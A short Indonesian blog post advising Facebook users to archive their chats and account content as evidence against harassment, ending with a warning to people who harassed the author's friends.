Lengkapi facebook Anda dengan aplikasi chat logger (untuk mencatat hasil chatting) dan facebook archiver (untuk mengarsip seluruh content facebook Anda ke hardisk) dan jangan hapus pesan di Kotak Masuk maupun email dari facebook. Social networking kadang berubah menjadi social not-working, tetapi jangan pernah mengganggu orang di facebook. Bagi orang-orang yang pernah melakukan teror terhadap kawan-kawan saya di facebook,, ingatlah : mengungkap kejahatan kalian hanyalah soal waktu.


Semoga bermanfaat
 

BLAZE.info Copyright © 2011-2012 | Powered by Blaze.vbs